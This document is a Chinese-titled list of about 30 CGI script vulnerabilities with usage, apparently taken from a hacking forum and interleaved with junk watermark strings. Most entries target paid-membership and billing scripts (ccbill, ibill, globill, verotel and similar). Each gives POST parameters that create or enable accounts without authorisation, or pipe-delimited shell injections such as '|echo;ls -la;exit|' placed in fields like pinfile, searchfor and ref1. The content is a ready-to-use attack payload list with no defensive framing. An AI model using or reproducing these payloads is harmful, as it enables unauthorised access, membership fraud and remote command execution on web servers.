Cgi-bin 30个漏洞＋使用方法

admin

==============================

/smspass.pl
username=username&password=password

# W6 m" r4 \1 K. u/ X- K/index.cgi
wei=ren&gen=command

1 w7 `2 D0 z6 B; m/passmaster.cgi
+ G9 D( C3 R/ l; sAction=Add&Username=Username&Password=Password

6 G+ X6 P, k  u# K, K/accountcreate.cgi
4 Y; |% V% M; A! Cusername=username&password=password&ref1=|echo;ls|
( y" L+ A8 k& O: ~5 M; n1 _
/form.cgi
+ S1 N+ h7 M+ w% T; r; ^& @) aname=xxxx&email=email&subject=xxxx&response=|echo;ls|
, Q7 R9 R! p- K. X7 s
/addusr.pl
/cgi-bin/EuroDebit/addusr.pl
- t" W+ ]3 ^5 suser=username&pass=Password&confirm=Password

/ccbill-local.asp
0 H5 z; s, ^' a/ i; i2 }0 cpost_values=username:password
$ e2 j( l% w4 S( _' _9 ^8 d
/count.cgi
# r# e1 f; X2 q9 ipinfile=|echo;ls -la;exit|

  N' g  o- w3 G" u9 ~- z; A/recon.cgi
/recon.cgi?search
searchoption=1&searchfor=|echo;ls -al;exit|
+ `+ S" M# M5 p
/verotelrum.pl
vercode=username:password:dseegsow:add:amount<&30>

/af.cgi
_browser_out=|echo;ls -la;exit;|

/modify.cgi
username=username&password=password&expire=30
1 S1 r4 T: e7 R, y' d, o
, S* y0 _# J' y1 @7 }/openjournal.cgi
6 ^. e! N* ?% ]- L, _  Q1 v+ x& Xedit=1&ct=2&go=|echo;ls -al;exit|

: g1 H' H2 E" D: m1 K* k" K+ Q- w/gx9passwd.cgi
8 [7 V! ]$ k) S: r2 }cmd=ADD&user=username&pass=password
1 W: F7 m; T' L& I. Q; K$ [* f
, X6 h- |8 x2 B& @) S: I( c/probecontrol.cgi
command=enable&username=username&password=password
# Q) L0 d9 |8 M  C4 a$ P
$ V! r' T! J7 }( L; T" Y  ?7 B/recon.cgi
& U( t2 M- h' d) m5 Msearchoption=3&searchfor=echo;ls -la;exit

8 ~4 f" `7 b: v; D/htadd.pl
configfile=|echo; ls -alt; exit

/gx9passwd.cgi
1 h: J/ O! v; [, ccmd=ADD&user=username&pass=password
' y0 Y( b0 _' h; A0 M
/ ~; O1 s) T' B/ibill*.pl
reqtype=add&authpwd=authpwd&username=username&password=password
5 H' U+ M( c$ n6 W) K+ U2 l  T. h2 O
/ e, A# U1 Z7 c6 [5 I3 F; x/cpay.cgi
command=add_member&username=username(EMAIL)&password=password(DES)

% g7 O2 P) |, R* F1 x/globill_ut.cgi
do=add&username=username&password=password&wpassword=password
: B3 E. L$ j5 G- ]: Q" [- s% ?' e' \
/usercontrol.cgi
command=enable&username=USER&password=PASS
: ]! ^7 d3 _# B6 L: a
. }6 R/ b+ ^; |, O  u1 e* o/globoSALErum.cgi
action=ADD&seccode=seccode&login=username&password=password
1 K( j  n, Z5 e( c( A7 J
; [, E% _% Z! p# A: w! e( S/addusr.pl
. i# T3 w0 X% i/ ?1 Yuser=USER&pass=PASS&confirm=PASS

/pincount.cgi
8 M- L* q. ^6 a; S. T: c7 m/cgi-bin/mastergate/pincount.cgi
) O& I4 L  f9 J' opinfile=|echo;pwd;exit|
1 C, c" N  r7 O8 d
6 f( w5 i" ?) k/accountcreate.cgi
/cgi-bin/gateway/accountcreate.cgi
username=username&password=password&password2=password&ref1=|echo;ls -al;exit

  p3 C- M8 X$ Y0 z5 B3 D" y+ `/af.cgi
/env.cgi
8 [% v% B+ {; J' c7 r- P9 tADD+;echo;pwd;exit

/ C2 |. i2 l/ g  p/count.cgi
pinfile=|echo;pwd;exit|
8 ]$ _6 X4 S, A, O9 L
/recon.cgi
  Z; _& m3 D  X3 M# p' s. _! y8 Asearchoption=1&searchfor=|echo;ls%20-al;exit|

5 \/ g* Y$ n! l1 D/add.cgi
- R9 }  ?  n  W% ^username=username&password=password&expire=30

7 L. B/ ~: r& l* J* V' m==============================